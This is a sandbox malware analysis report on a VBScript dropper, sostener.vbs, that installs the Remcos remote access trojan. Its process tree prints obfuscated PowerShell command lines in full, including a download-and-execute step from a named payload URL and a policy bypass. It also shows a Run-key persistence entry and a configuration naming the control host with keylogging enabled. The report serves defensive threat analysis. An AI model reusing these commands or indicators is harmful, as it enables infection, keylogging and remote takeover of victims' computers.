Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
sostener.vbs

Overview

General Information

Sample name:sostener.vbs
Analysis ID:1519307
MD5:e260955361dc0c8454fcfa061a45f6f1
SHA1:bb77b8e3ef1c8d30cb5dbb90725d34e3c7602e13
SHA256:e9cc243923de94787673438f26c30baefe9995b38c8b8047b95726b998baf26c
Tags:vbsuser-lontze7
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Creates autostart registry keys with suspicious names
Creates autostart registry keys with suspicious values (likely registry only malware)
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript called in batch mode (surpress errors)
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6368 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6524 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6916 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 1396 cmdline: powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 3272 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 5432 cmdline: powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 2032 cmdline: powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • RegSvcs.exe (PID: 6368 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
        • RegSvcs.exe (PID: 2124 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • powershell.exe (PID: 7468 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' " MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wscript.exe (PID: 7604 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • powershell.exe (PID: 7656 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wscript.exe (PID: 7764 cmdline: "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs MD5: A47CBE969EA935BDD3AB568BB126BC80)
          • powershell.exe (PID: 7812 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL; MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7924 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));" MD5: 04029E121A0CFA5991749937DD22A1D9)
              • powershell.exe (PID: 8024 cmdline: powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
                • powershell.exe (PID: 1732 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
              • powershell.exe (PID: 8032 cmdline: powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • powershell.exe (PID: 8052 cmdline: powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • RegSvcs.exe (PID: 7336 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
              • RegSvcs.exe (PID: 7344 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • powershell.exe (PID: 1740 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' " MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wscript.exe (PID: 7444 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • powershell.exe (PID: 7452 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wscript.exe (PID: 7560 cmdline: "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs MD5: A47CBE969EA935BDD3AB568BB126BC80)
          • powershell.exe (PID: 7620 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL; MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7728 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));" MD5: 04029E121A0CFA5991749937DD22A1D9)
              • powershell.exe (PID: 2992 cmdline: powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
                • powershell.exe (PID: 6468 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
              • powershell.exe (PID: 7788 cmdline: powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • powershell.exe (PID: 7768 cmdline: powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • RegSvcs.exe (PID: 6852 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "special2023.duckdns.org:8888:1", "Assigned name": "Nlk", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-3PWW8O", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000029.00000002.2090438296.0000000000677000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000003.00000002.2423857034.0000029B2A4A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000003.00000002.2423857034.0000029B2A4A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          00000003.00000002.2423857034.0000029B2A4A0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x14f20:$a1: Remcos restarted by watchdog!
          • 0x15498:$a3: %02i:%02i:%02i:%03i
          00000003.00000002.2965204743.0000029B32A20000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
            Click to see the 38 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.powershell.exe.29b32a20000.4.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              3.2.powershell.exe.29b32a20000.4.raw.unpackMALWARE_Win_DLAgent09Detects known downloader agentditekSHen
              • 0x1726:$h2: //:sptth
              • 0xfc1:$s1: DownloadString
              • 0xe27:$s2: StrReverse
              • 0xfb0:$s3: FromBase64String
              • 0x1237:$s4: WebClient
              21.2.powershell.exe.23a4acf1928.3.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                21.2.powershell.exe.23a4acf1928.3.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  21.2.powershell.exe.23a4acf1928.3.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x690a8:$a1: Remcos restarted by watchdog!
                  • 0x69620:$a3: %02i:%02i:%02i:%03i
                  Click to see the 47 entries

                  Other

                  SourceRuleDescriptionAuthorStrings
                  amsi64_6916.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                    amsi64_7924.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                      amsi64_7728.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Base64 Encoded PowerShell Command Detected
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [syst
                        Sigma detected: New RUN Key Pointing to Suspicious Folder
                        Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: Powershell.exe -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' ", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3272, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\_______________________-------------
                        Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
